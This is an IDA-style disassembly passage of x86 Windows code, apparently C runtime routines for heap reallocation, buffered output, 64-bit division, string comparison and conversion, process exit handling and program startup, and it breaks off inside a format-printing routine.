loc_41958F: ; CODE XREF: sub_41944F+38�j
cmp eax, 2
jnz loc_4196AA
cmp esi, 0FFFFFFE0h
ja short loc_4195AC
test esi, esi
jbe short loc_4195A9
add esi, 0Fh
and esi, 0FFFFFFF0h
jmp short loc_4195AC
; ---------------------------------------------------------------------------
loc_4195A9: ; CODE XREF: sub_41944F+150�j
push 10h
pop esi
loc_4195AC: ; CODE XREF: sub_41944F+14C�j
; sub_41944F+158�j ...
xor edi, edi
cmp esi, 0FFFFFFE0h
ja loc_41968C
lea eax, [ebp+arg_4]
push eax
lea eax, [ebp+var_4]
push eax
push [ebp+arg_0]
call sub_41BAE4
mov ebx, eax
add esp, 0Ch
test ebx, ebx
jz loc_419670
cmp esi, ds:dword_435EB4
jnb short loc_419634
mov edi, esi
shr edi, 4
push edi
push ebx
push [ebp+arg_4]
push [ebp+var_4]
call sub_41BEAC
add esp, 10h
test eax, eax
jz short loc_4195FA
mov edi, [ebp+arg_0]
jmp short loc_41962C
; ---------------------------------------------------------------------------
loc_4195FA: ; CODE XREF: sub_41944F+1A4�j
push edi
call sub_41BB80
mov edi, eax
pop ecx
test edi, edi
jz short loc_419634
movzx eax, byte ptr [ebx]
shl eax, 4
cmp eax, esi
jb short loc_419613
mov eax, esi
loc_419613: ; CODE XREF: sub_41944F+1C0�j
push eax
push [ebp+arg_0]
push edi
call sub_417390
push ebx
push [ebp+arg_4]
push [ebp+var_4]
call sub_41BB3B
add esp, 18h
loc_41962C: ; CODE XREF: sub_41944F+1A9�j
test edi, edi
jnz loc_419588
loc_419634: ; CODE XREF: sub_41944F+18B�j
; sub_41944F+1B6�j
push esi
push 0
push ds:dword_4CF024
call ds:dword_4240E8 ;; RtlAllocateHeap
mov edi, eax
test edi, edi
jz short loc_41968C
movzx eax, byte ptr [ebx]
shl eax, 4
cmp eax, esi
jb short loc_419655
mov eax, esi
loc_419655: ; CODE XREF: sub_41944F+202�j
push eax
push [ebp+arg_0]
push edi
call sub_417390
push ebx
push [ebp+arg_4]
push [ebp+var_4]
call sub_41BB3B
add esp, 18h
jmp short loc_419684
; ---------------------------------------------------------------------------
loc_419670: ; CODE XREF: sub_41944F+17F�j
push esi
push [ebp+arg_0]
push 0
push ds:dword_4CF024
call ds:dword_424194 ;; RtlReAllocateHeap
mov edi, eax
loc_419684: ; CODE XREF: sub_41944F+21F�j
test edi, edi
jnz loc_419588
loc_41968C: ; CODE XREF: sub_41944F+162�j
; sub_41944F+1F8�j
cmp ds:dword_4CDA14, 0
jz loc_419588
push esi
call sub_41AB54
test eax, eax
pop ecx
jnz loc_4195AC
jmp short loc_4196E8
; ---------------------------------------------------------------------------
loc_4196AA: ; CODE XREF: sub_41944F+143�j
; sub_41944F+297�j
xor eax, eax
cmp esi, 0FFFFFFE0h
ja short loc_4196D4
test esi, esi
jnz short loc_4196B8
push 1
pop esi
loc_4196B8: ; CODE XREF: sub_41944F+264�j
add esi, 0Fh
and esi, 0FFFFFFF0h
push esi
push [ebp+arg_0]
push 0
push ds:dword_4CF024
call ds:dword_424194 ;; RtlReAllocateHeap
test eax, eax
jnz short loc_4196EA
loc_4196D4: ; CODE XREF: sub_41944F+260�j
cmp ds:dword_4CDA14, 0
jz short loc_4196EA
push esi
call sub_41AB54
test eax, eax
pop ecx
jnz short loc_4196AA
loc_4196E8: ; CODE XREF: sub_41944F+2B�j
; sub_41944F+134�j ...
xor eax, eax
loc_4196EA: ; CODE XREF: sub_41944F+16�j
; sub_41944F+13B�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_41944F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4196EF proc near ; CODE XREF: sub_40C8B4+127�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
mov edi, [ebp+arg_4]
imul edi, [ebp+arg_8]
mov eax, [ebp+arg_0]
mov [ebp+var_4], edi
test edi, edi
mov [ebp+arg_0], eax
mov ebx, edi
jnz short loc_419713
xor eax, eax
jmp loc_4197E0
; ---------------------------------------------------------------------------
loc_419713: ; CODE XREF: sub_4196EF+1B�j
mov esi, [ebp+arg_C]
test word ptr [esi+0Ch], 10Ch
jz short loc_419726
mov eax, [esi+18h]
mov [ebp+arg_C], eax
jmp short loc_41972D
; ---------------------------------------------------------------------------
loc_419726: ; CODE XREF: sub_4196EF+2D�j
mov [ebp+arg_C], 1000h
loc_41972D: ; CODE XREF: sub_4196EF+35�j
; sub_4196EF+E8�j
mov ecx, [esi+0Ch]
and ecx, 108h
jz short loc_419761
mov eax, [esi+4]
test eax, eax
jz short loc_419761
cmp ebx, eax
mov edi, ebx
jb short loc_419747
mov edi, eax
loc_419747: ; CODE XREF: sub_4196EF+54�j
push edi
push [ebp+arg_0]
push dword ptr [esi]
call sub_417390
sub [esi+4], edi
add [esi], edi
add esp, 0Ch
sub ebx, edi
add [ebp+arg_0], edi
jmp short loc_4197A7
; ---------------------------------------------------------------------------
loc_419761: ; CODE XREF: sub_4196EF+47�j
; sub_4196EF+4E�j
cmp ebx, [ebp+arg_C]
jb short loc_4197AC
test ecx, ecx
jz short loc_419775
push esi
call sub_41A7D0
test eax, eax
pop ecx
jnz short loc_4197EE
loc_419775: ; CODE XREF: sub_4196EF+79�j
cmp [ebp+arg_C], 0
jz short loc_419788
mov eax, ebx
xor edx, edx
div [ebp+arg_C]
mov edi, ebx
sub edi, edx
jmp short loc_41978A
; ---------------------------------------------------------------------------
loc_419788: ; CODE XREF: sub_4196EF+8A�j
mov edi, ebx
loc_41978A: ; CODE XREF: sub_4196EF+97�j
push edi
push [ebp+arg_0]
push dword ptr [esi+10h]
call sub_41ED97
add esp, 0Ch
cmp eax, 0FFFFFFFFh
jz short loc_4197E5
add [ebp+arg_0], eax
sub ebx, eax
cmp eax, edi
jb short loc_4197E5
loc_4197A7: ; CODE XREF: sub_4196EF+70�j
mov edi, [ebp+var_4]
jmp short loc_4197D5
; ---------------------------------------------------------------------------
loc_4197AC: ; CODE XREF: sub_4196EF+75�j
mov eax, [ebp+arg_0]
push esi
movsx eax, byte ptr [eax]
push eax
call sub_419D23
pop ecx
cmp eax, 0FFFFFFFFh
pop ecx
jz short loc_4197EE
inc [ebp+arg_0]
mov eax, [esi+18h]
dec ebx
mov [ebp+arg_C], eax
test eax, eax
jg short loc_4197D5
mov [ebp+arg_C], 1
loc_4197D5: ; CODE XREF: sub_4196EF+BB�j
; sub_4196EF+DD�j
test ebx, ebx
jnz loc_41972D
mov eax, [ebp+arg_8]
loc_4197E0: ; CODE XREF: sub_4196EF+1F�j
; sub_4196EF+108�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_4197E5: ; CODE XREF: sub_4196EF+AD�j
; sub_4196EF+B6�j
or dword ptr [esi+0Ch], 20h
mov eax, [ebp+var_4]
jmp short loc_4197F0
; ---------------------------------------------------------------------------
loc_4197EE: ; CODE XREF: sub_4196EF+84�j
; sub_4196EF+CF�j
mov eax, edi
loc_4197F0: ; CODE XREF: sub_4196EF+FD�j
sub eax, ebx
xor edx, edx
div [ebp+arg_4]
jmp short loc_4197E0
sub_4196EF endp
; =============== S U B R O U T I N E =======================================
sub_4197F9 proc near ; CODE XREF: sub_40D000+8�p
arg_0 = dword ptr 4
arg_4 = byte ptr 8
push [esp+arg_0]
call ds:off_4240A8
cmp eax, 0FFFFFFFFh
jnz short loc_419819
call ds:dword_42408C ;; RtlGetLastWin32Error
push eax
call sub_41EF44
pop ecx
loc_419815: ; CODE XREF: sub_4197F9+3F�j
or eax, 0FFFFFFFFh
retn
; ---------------------------------------------------------------------------
loc_419819: ; CODE XREF: sub_4197F9+D�j
test al, 1
jz short loc_41983A
test [esp+arg_4], 2
jz short loc_41983A
mov ds:dword_4CD9B4, 0Dh
mov ds:dword_4CD9B8, 5
jmp short loc_419815
; ---------------------------------------------------------------------------
loc_41983A: ; CODE XREF: sub_4197F9+22�j
; sub_4197F9+29�j
xor eax, eax
retn
sub_4197F9 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_419840 proc near ; CODE XREF: sub_40D12A+5F�p
; sub_40D12A+92�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push edi
push esi
push ebx
xor edi, edi
mov eax, [esp+0Ch+arg_4]
or eax, eax
jge short loc_419861
inc edi
mov edx, [esp+0Ch+arg_0]
neg eax
neg edx
sbb eax, 0
mov [esp+0Ch+arg_4], eax
mov [esp+0Ch+arg_0], edx
loc_419861: ; CODE XREF: sub_419840+B�j
mov eax, [esp+0Ch+arg_C]
or eax, eax
jge short loc_41987D
inc edi
mov edx, [esp+0Ch+arg_8]
neg eax
neg edx
sbb eax, 0
mov [esp+0Ch+arg_C], eax
mov [esp+0Ch+arg_8], edx
loc_41987D: ; CODE XREF: sub_419840+27�j
or eax, eax
jnz short loc_419899
mov ecx, [esp+0Ch+arg_8]
mov eax, [esp+0Ch+arg_4]
xor edx, edx
div ecx
mov ebx, eax
mov eax, [esp+0Ch+arg_0]
div ecx
mov edx, ebx
jmp short loc_4198DA
; ---------------------------------------------------------------------------
loc_419899: ; CODE XREF: sub_419840+3F�j
mov ebx, eax
mov ecx, [esp+0Ch+arg_8]
mov edx, [esp+0Ch+arg_4]
mov eax, [esp+0Ch+arg_0]
loc_4198A7: ; CODE XREF: sub_419840+71�j
shr ebx, 1
rcr ecx, 1
shr edx, 1
rcr eax, 1
or ebx, ebx
jnz short loc_4198A7
div ecx
mov esi, eax
mul [esp+0Ch+arg_C]
mov ecx, eax
mov eax, [esp+0Ch+arg_8]
mul esi
add edx, ecx
jb short loc_4198D5
cmp edx, [esp+0Ch+arg_4]
ja short loc_4198D5
jb short loc_4198D6
cmp eax, [esp+0Ch+arg_0]
jbe short loc_4198D6
loc_4198D5: ; CODE XREF: sub_419840+85�j
; sub_419840+8B�j
dec esi
loc_4198D6: ; CODE XREF: sub_419840+8D�j
; sub_419840+93�j
xor edx, edx
mov eax, esi
loc_4198DA: ; CODE XREF: sub_419840+57�j
dec edi
jnz short loc_4198E4
neg edx
neg eax
sbb edx, 0
loc_4198E4: ; CODE XREF: sub_419840+9B�j
pop ebx
pop esi
pop edi
retn 10h
sub_419840 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4198F0 proc near ; CODE XREF: sub_40D48D+1D�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov eax, [esp+arg_8]
test eax, eax
jz short locret_41993C
mov edx, [esp+arg_0]
push esi
push edi
mov esi, edx
mov edi, [esp+8+arg_4]
or edx, edi
and edx, 3
jz short loc_41993D
test eax, 1
jz short loc_41991D
mov cl, [esi]
cmp cl, [edi]
jnz short loc_41996A
inc esi
inc edi
dec eax
jz short loc_41993A
loc_41991D: ; CODE XREF: sub_4198F0+20�j
; sub_4198F0+48�j
mov cl, [esi]
mov dl, [edi]
cmp cl, dl
jnz short loc_41996A
mov cl, [esi+1]
mov dl, [edi+1]
cmp cl, dl
jnz short loc_41996A
add edi, 2
add esi, 2
sub eax, 2
jnz short loc_41991D
loc_41993A: ; CODE XREF: sub_4198F0+2B�j
; sub_4198F0+84�j
pop edi
pop esi
locret_41993C: ; CODE XREF: sub_4198F0+6�j
retn
; ---------------------------------------------------------------------------
loc_41993D: ; CODE XREF: sub_4198F0+19�j
mov ecx, eax
and eax, 3
shr ecx, 2
jz short loc_419972
repe cmpsd
jz short loc_419972
mov ecx, [esi-4]
mov edx, [edi-4]
cmp cl, dl
jnz short loc_419965
cmp ch, dh
jnz short loc_419965
shr ecx, 10h
shr edx, 10h
cmp cl, dl
jnz short loc_419965
cmp ch, dh
loc_419965: ; CODE XREF: sub_4198F0+63�j
; sub_4198F0+67�j ...
mov eax, 0
loc_41996A: ; CODE XREF: sub_4198F0+26�j
; sub_4198F0+33�j ...
sbb eax, eax
pop edi
sbb eax, 0FFFFFFFFh
pop esi
retn
; ---------------------------------------------------------------------------
loc_419972: ; CODE XREF: sub_4198F0+55�j
; sub_4198F0+59�j
test eax, eax
jz short loc_41993A
mov edx, [esi]
mov ecx, [edi]
cmp dl, cl
jnz short loc_419965
dec eax
jz short loc_419999
cmp dh, ch
jnz short loc_419965
dec eax
jz short loc_419999
and ecx, 0FF0000h
and edx, 0FF0000h
cmp edx, ecx
jnz short loc_419965
dec eax
loc_419999: ; CODE XREF: sub_4198F0+8F�j
; sub_4198F0+96�j
pop edi
pop esi
retn
sub_4198F0 endp
; =============== S U B R O U T I N E =======================================
sub_41999C proc near ; CODE XREF: sub_40E5EB+55�p
; sub_415F88+236�p
arg_0 = dword ptr 4
mov ecx, [esp+arg_0]
cmp word ptr [ecx], 0
lea eax, [ecx+2]
jz short loc_4199B3
loc_4199A9: ; CODE XREF: sub_41999C+15�j
mov dx, [eax]
inc eax
inc eax
test dx, dx
jnz short loc_4199A9
loc_4199B3: ; CODE XREF: sub_41999C+B�j
sub eax, ecx
sar eax, 1
dec eax
retn
sub_41999C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4199B9 proc near ; CODE XREF: sub_40E5EB+19�p
; sub_40E5EB+49�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
mov edx, [ebp+arg_0]
push ebx
push esi
xor esi, esi
xor eax, eax
cmp edx, esi
push edi
jz loc_419A86
mov edi, [ebp+arg_8]
cmp edi, esi
jz loc_419AB3
cmp ds:dword_4CDA48, esi
jnz short loc_419A0A
cmp edi, esi
jbe loc_419AB3
loc_4199E9: ; CODE XREF: sub_4199B9+4A�j
mov ecx, [ebp+arg_4]
add ecx, eax
movzx si, byte ptr [ecx]
mov [edx], si
cmp byte ptr [ecx], 0
jz loc_419AB3
inc eax
inc edx
inc edx
cmp eax, edi
jb short loc_4199E9
jmp loc_419AB3
; ---------------------------------------------------------------------------
loc_419A0A: ; CODE XREF: sub_4199B9+26�j
mov ebx, [ebp+arg_4]
mov esi, ds:dword_424070
push edi
push edx
push 0FFFFFFFFh
push ebx
push 9
push ds:dword_4CDA58
call esi ; MultiByteToWideChar
test eax, eax
jnz loc_419AB2
call ds:dword_42408C ;; RtlGetLastWin32Error
cmp eax, 7Ah
jz short loc_419A44
loc_419A35: ; CODE XREF: sub_4199B9+CB�j
; sub_4199B9+F7�j
mov ds:dword_4CD9B4, 2Ah
or eax, 0FFFFFFFFh
jmp short loc_419AB3
; ---------------------------------------------------------------------------
loc_419A44: ; CODE XREF: sub_4199B9+7A�j
lea ecx, [edi-1]
mov eax, ebx
mov [ebp+arg_4], ecx
loc_419A4C: ; CODE XREF: sub_4199B9+B3�j
mov cl, [eax]
test cl, cl
jz short loc_419A6E
mov edx, ds:off_433C70
movzx ecx, cl
test byte ptr [edx+ecx*2+1], 80h
jz short loc_419A63
inc eax
loc_419A63: ; CODE XREF: sub_4199B9+A7�j
mov ecx, [ebp+arg_4]
inc eax
dec [ebp+arg_4]
test ecx, ecx
jnz short loc_419A4C
loc_419A6E: ; CODE XREF: sub_4199B9+97�j
push edi
sub eax, ebx
push [ebp+arg_0]
push eax
push ebx
push 1
push ds:dword_4CDA58
call esi ; MultiByteToWideChar
test eax, eax
jnz short loc_419AB3
jmp short loc_419A35
; ---------------------------------------------------------------------------
loc_419A86: ; CODE XREF: sub_4199B9+F�j
cmp ds:dword_4CDA48, esi
jnz short loc_419A99
push [ebp+arg_4]
call sub_417AB0
pop ecx
jmp short loc_419AB3
; ---------------------------------------------------------------------------
loc_419A99: ; CODE XREF: sub_4199B9+D3�j
push esi
push esi
push 0FFFFFFFFh
push [ebp+arg_4]
push 9
push ds:dword_4CDA58
call ds:dword_424070 ;; MultiByteToWideChar
cmp eax, esi
jz short loc_419A35
loc_419AB2: ; CODE XREF: sub_4199B9+6B�j
dec eax
loc_419AB3: ; CODE XREF: sub_4199B9+1A�j
; sub_4199B9+2A�j ...
pop edi
pop esi
pop ebx
pop ebp
retn
sub_4199B9 endp
; =============== S U B R O U T I N E =======================================
sub_419AB8 proc near ; CODE XREF: _0:00419C77�p
mov eax, ds:off_433C3C
test eax, eax
jz short loc_419AC3
call eax ; sub_417D73
loc_419AC3: ; CODE XREF: sub_419AB8+7�j
push offset dword_426028
push offset dword_426014
call sub_419BA0
push offset dword_426010
push offset dword_426000
call sub_419BA0
add esp, 10h
retn
sub_419AB8 endp
; =============== S U B R O U T I N E =======================================
sub_419AE5 proc near ; CODE XREF: _0:00419CB6�p
arg_0 = dword ptr 4
push 0
push 0
push [esp+8+arg_0]
call sub_419B07
add esp, 0Ch
retn
sub_419AE5 endp
; =============== S U B R O U T I N E =======================================
sub_419AF6 proc near ; CODE XREF: _0:00419CD5�p
; sub_419CDA+1C�p ...
arg_0 = dword ptr 4
push 0
push 1
push [esp+8+arg_0]
call sub_419B07
add esp, 0Ch
retn
sub_419AF6 endp
; =============== S U B R O U T I N E =======================================
sub_419B07 proc near ; CODE XREF: sub_419AE5+8�p
; sub_419AF6+8�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push edi
push 1
pop edi
cmp ds:dword_4CD9FC, edi
jnz short loc_419B24
push [esp+4+arg_0]
call ds:dword_42413C ;; GetCurrentProcess
push eax
call ds:dword_424170 ;; TerminateProcess
loc_419B24: ; CODE XREF: sub_419B07+A�j
cmp [esp+4+arg_4], 0
push ebx
mov ebx, [esp+8+arg_8]
mov ds:dword_4CD9F8, edi
mov ds:byte_4CD9F4, bl
jnz short loc_419B78
mov eax, ds:dword_4CF03C
test eax, eax
jz short loc_419B67
mov ecx, ds:dword_4CF038
push esi
lea esi, [ecx-4]
cmp esi, eax
jb short loc_419B66
loc_419B53: ; CODE XREF: sub_419B07+5D�j
mov eax, [esi]
test eax, eax
jz short loc_419B5B
call eax
loc_419B5B: ; CODE XREF: sub_419B07+50�j
sub esi, 4
cmp esi, ds:dword_4CF03C
jnb short loc_419B53
loc_419B66: ; CODE XREF: sub_419B07+4A�j
pop esi
loc_419B67: ; CODE XREF: sub_419B07+3C�j
push offset dword_426034
push offset dword_42602C
call sub_419BA0
pop ecx
pop ecx
loc_419B78: ; CODE XREF: sub_419B07+33�j
push offset dword_426040
push offset dword_426038
call sub_419BA0
pop ecx
pop ecx
test ebx, ebx
pop ebx
jnz short loc_419B9E
push [esp+4+arg_0]
mov ds:dword_4CD9FC, edi
call ds:off_42414C
loc_419B9E: ; CODE XREF: sub_419B07+85�j
pop edi
retn
sub_419B07 endp
; =============== S U B R O U T I N E =======================================
sub_419BA0 proc near ; CODE XREF: sub_419AB8+15�p
; sub_419AB8+24�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
mov esi, [esp+4+arg_0]
loc_419BA5: ; CODE XREF: sub_419BA0+16�j
cmp esi, [esp+4+arg_4]
jnb short loc_419BB8
mov eax, [esi]
test eax, eax
jz short loc_419BB3
call eax
loc_419BB3: ; CODE XREF: sub_419BA0+F�j
add esi, 4
jmp short loc_419BA5
; ---------------------------------------------------------------------------
loc_419BB8: ; CODE XREF: sub_419BA0+9�j
pop esi
retn
sub_419BA0 endp
; =============== S U B R O U T I N E =======================================
sub_419BBA proc near ; CODE XREF: sub_40EE72+2BBB�p
arg_0 = dword ptr 4
push [esp+arg_0]
call ds:dword_424158 ;; DeleteFileA
test eax, eax
jnz short loc_419BD0
call ds:dword_42408C ;; RtlGetLastWin32Error
jmp short loc_419BD2
; ---------------------------------------------------------------------------
loc_419BD0: ; CODE XREF: sub_419BBA+C�j
xor eax, eax
loc_419BD2: ; CODE XREF: sub_419BBA+14�j
test eax, eax
jz short loc_419BE1
push eax
call sub_41EF44
pop ecx
or eax, 0FFFFFFFFh
retn
; ---------------------------------------------------------------------------
loc_419BE1: ; CODE XREF: sub_419BBA+1A�j
xor eax, eax
retn
sub_419BBA endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_4246B0
push offset sub_41F774
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 58h
push ebx
push esi
push edi
mov [ebp-18h], esp
call ds:dword_4241A0 ;; GetVersion
xor edx, edx
mov dl, ah
mov ds:dword_4CD9CC, edx
mov ecx, eax
and ecx, 0FFh
mov ds:dword_4CD9C8, ecx
shl ecx, 8
add ecx, edx
mov ds:dword_4CD9C4, ecx
shr eax, 10h
mov ds:dword_4CD9C0, eax
xor esi, esi
push esi
call sub_41ACE4
pop ecx
test eax, eax
jnz short loc_419C50
push 1Ch
call sub_419CFF
pop ecx
loc_419C50: ; CODE XREF: _0:00419C46�j
mov [ebp-4], esi
call sub_41F5BF
call ds:dword_42419C ;; GetCommandLineA
mov ds:dword_4CF02C, eax
call sub_41F48D
mov ds:dword_4CDA00, eax
call sub_41F240
call sub_41F187
call sub_419AB8
mov [ebp-30h], esi
lea eax, [ebp-5Ch]
push eax
call ds:dword_424198 ;; GetStartupInfoA
call sub_41F12F
mov [ebp-64h], eax
test byte ptr [ebp-30h], 1
jz short loc_419C9D
movzx eax, word ptr [ebp-2Ch]
jmp short loc_419CA0
; ---------------------------------------------------------------------------
loc_419C9D: ; CODE XREF: _0:00419C95�j
push 0Ah
pop eax
loc_419CA0: ; CODE XREF: _0:00419C9B�j
push eax
push dword ptr [ebp-64h]
push esi
push esi
call ds:off_424100
push eax
call sub_40E6A9
mov [ebp-60h], eax
push eax
call sub_419AE5
mov eax, [ebp-14h]
mov ecx, [eax]
mov ecx, [ecx]
mov [ebp-68h], ecx
push eax
push ecx
call sub_41EFAB
pop ecx
pop ecx
retn
; ---------------------------------------------------------------------------
mov esp, [ebp-18h]
push dword ptr [ebp-68h]
call sub_419AF6
; =============== S U B R O U T I N E =======================================
sub_419CDA proc near ; CODE XREF: sub_418682+16�p
; sub_41F187+4E�p ...
arg_0 = dword ptr 4
cmp ds:dword_4CDA08, 1
jnz short loc_419CE8
call sub_41F84C
loc_419CE8: ; CODE XREF: sub_419CDA+7�j
push [esp+arg_0]
call sub_41F885
push 0FFh
call ds:off_433C60
pop ecx
pop ecx
retn
sub_419CDA endp
; =============== S U B R O U T I N E =======================================
sub_419CFF proc near ; CODE XREF: _0:00419C4A�p
arg_0 = dword ptr 4
cmp ds:dword_4CDA08, 1
jnz short loc_419D0D
call sub_41F84C
loc_419D0D: ; CODE XREF: sub_419CFF+7�j
push [esp+arg_0]
call sub_41F885
pop ecx
push 0FFh
call ds:off_42414C
retn
sub_419CFF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419D23 proc near ; CODE XREF: sub_4172B0+46�p
; sub_41782A+45�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ebx
push esi
mov esi, [ebp+arg_4]
mov eax, [esi+0Ch]
mov ebx, [esi+10h]
test al, 82h
jz loc_419E2C
test al, 40h
jnz loc_419E2C
test al, 1
jz short loc_419D5B
and dword ptr [esi+4], 0
test al, 10h
jz loc_419E2C
mov ecx, [esi+8]
and al, 0FEh
mov [esi], ecx
mov [esi+0Ch], eax
loc_419D5B: ; CODE XREF: sub_419D23+20�j
mov eax, [esi+0Ch]
and dword ptr [esi+4], 0
and [ebp+arg_4], 0
and al, 0EFh
or al, 2
test ax, 10Ch
mov [esi+0Ch], eax
jnz short loc_419D95
cmp esi, offset dword_4363A8
jz short loc_419D83
cmp esi, offset dword_4363C8
jnz short loc_419D8E
loc_419D83: ; CODE XREF: sub_419D23+56�j
push ebx
call sub_41FA1C
test eax, eax
pop ecx
jnz short loc_419D95
loc_419D8E: ; CODE XREF: sub_419D23+5E�j
push esi
call sub_41F9D8
pop ecx
loc_419D95: ; CODE XREF: sub_419D23+4E�j
; sub_419D23+69�j
test word ptr [esi+0Ch], 108h
push edi
jz short loc_419E02
mov eax, [esi+8]
mov edi, [esi]
sub edi, eax
lea ecx, [eax+1]
mov [esi], ecx
mov ecx, [esi+18h]
dec ecx
test edi, edi
mov [esi+4], ecx
jle short loc_419DC5
push edi
push eax
push ebx
call sub_41ED97
add esp, 0Ch
mov [ebp+arg_4], eax
jmp short loc_419DF8
; ---------------------------------------------------------------------------
loc_419DC5: ; CODE XREF: sub_419D23+90�j
cmp ebx, 0FFFFFFFFh
jz short loc_419DE0
mov eax, ebx
mov ecx, ebx
sar eax, 5
and ecx, 1Fh
mov eax, ds:dword_4CECE0[eax*4]
lea eax, [eax+ecx*8]
jmp short loc_419DE5
; ---------------------------------------------------------------------------
loc_419DE0: ; CODE XREF: sub_419D23+A5�j
mov eax, offset dword_4362F0
loc_419DE5: ; CODE XREF: sub_419D23+BB�j
test byte ptr [eax+4], 20h
jz short loc_419DF8
push 2
push 0
push ebx
call sub_41E517
add esp, 0Ch
loc_419DF8: ; CODE XREF: sub_419D23+A0�j
; sub_419D23+C6�j
mov eax, [esi+8]
mov cl, byte ptr [ebp+arg_0]
mov [eax], cl
jmp short loc_419E16
; ---------------------------------------------------------------------------
loc_419E02: ; CODE XREF: sub_419D23+79�j
push 1
lea eax, [ebp+arg_0]
pop edi
push edi
push eax
push ebx
call sub_41ED97
add esp, 0Ch
mov [ebp+arg_4], eax
loc_419E16: ; CODE XREF: sub_419D23+DD�j
cmp [ebp+arg_4], edi
pop edi
jz short loc_419E22
or dword ptr [esi+0Ch], 20h
jmp short loc_419E31
; ---------------------------------------------------------------------------
loc_419E22: ; CODE XREF: sub_419D23+F7�j
mov eax, [ebp+arg_0]
and eax, 0FFh
jmp short loc_419E34
; ---------------------------------------------------------------------------
loc_419E2C: ; CODE XREF: sub_419D23+10�j
; sub_419D23+18�j ...
or al, 20h
mov [esi+0Ch], eax
loc_419E31: ; CODE XREF: sub_419D23+FD�j
or eax, 0FFFFFFFFh
loc_419E34: ; CODE XREF: sub_419D23+107�j
pop esi
pop ebx
pop ebp
retn
sub_419D23 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419E38 proc near ; CODE XREF: sub_4172B0+29�p
; sub_41782A+28�p ...
var_248 = byte ptr -248h
var_247 = byte ptr -247h
var_49 = byte ptr -49h
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = byte ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_16 = byte ptr -16h
var_15 = byte ptr -15h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 248h
push ebx
push esi
push edi
mov edi, [ebp+arg_4]
xor esi, esi
mov bl, [edi]
inc edi
test bl, bl
mov [ebp+var_C], esi
mov [ebp+var_14], esi
mov [ebp+arg_4], edi
jz loc_41A551
mov ecx, [ebp+var_10]
xor edx, edx
jmp short loc_419E6C
; ---------------------------------------------------------------------------
loc_419E64: ; CODE XREF: sub_419E38+713�j
mov ecx, [ebp+var_10]
mov esi, [ebp+var_30]
xor edx, edx
loc_419E6C: ; CODE XREF: sub_419E38+2A�j
cmp [ebp+var_14], edx
jl loc_41A551
cmp bl, 20h
jl short loc_419E8D
cmp bl, 78h
jg short loc_419E8D
movsx eax, bl
mov al, [eax+42469Ch]
and eax, 0Fh
jmp short loc_419E8F
; ---------------------------------------------------------------------------
loc_419E8D: ; CODE XREF: sub_419E38+40�j
; sub_419E38+45�j
xor eax, eax
loc_419E8F: ; CODE XREF: sub_419E38+53�j
movsx eax, ds:byte_4246BC[esi+eax*8]
sar eax, 4
cmp eax, 7 ; switch 8 cases
mov [ebp+var_30], eax
ja loc_41A540 ; default
jmp off_41A559[eax*4] ; switch jump
loc_419EAD: ; DATA XREF: _0:off_41A559�o
or [ebp+var_10], 0FFFFFFFFh ; jumptable 00419EA6 case 1
mov [ebp+var_34], edx
mov [ebp+var_28], edx
mov [ebp+var_20], edx
mov [ebp+var_1C], edx
mov [ebp+var_4], edx
mov [ebp+var_24], edx
jmp loc_41A540 ; default
; ---------------------------------------------------------------------------
loc_419EC8: ; CODE XREF: sub_419E38+6E�j
; DATA XREF: _0:off_41A559�o
movsx eax, bl ; jumptable 00419EA6 case 2
sub eax, 20h
jz short loc_419F0B
sub eax, 3
jz short loc_419F02
sub eax, 8
jz short loc_419EF9
dec eax
dec eax
jz short loc_419EF0
sub eax, 3
jnz loc_41A540 ; default
or [ebp+var_4], 8
jmp loc_41A540 ; default
; ---------------------------------------------------------------------------
loc_419EF0: ; CODE XREF: sub_419E38+A4�j
or [ebp+var_4], 4
jmp loc_41A540 ; default
; ---------------------------------------------------------------------------
loc_419EF9: ; CODE XREF: sub_419E38+A0�j
or [ebp+var_4], 1
jmp loc_41A540 ; default
; ---------------------------------------------------------------------------
loc_419F02: ; CODE XREF: sub_419E38+9B�j
or byte ptr [ebp+var_4], 80h
jmp loc_41A540 ; default
; ---------------------------------------------------------------------------
loc_419F0B: ; CODE XREF: sub_419E38+96�j
or [ebp+var_4], 2
jmp loc_41A540 ; default
; ---------------------------------------------------------------------------
loc_419F14: ; CODE XREF: sub_419E38+6E�j
; DATA XREF: _0:off_41A559�o
cmp bl, 2Ah ; jumptable 00419EA6 case 3
jnz short loc_419F3C
lea eax, [ebp+arg_8]
push eax
call sub_41A617
test eax, eax
pop ecx
mov [ebp+var_20], eax
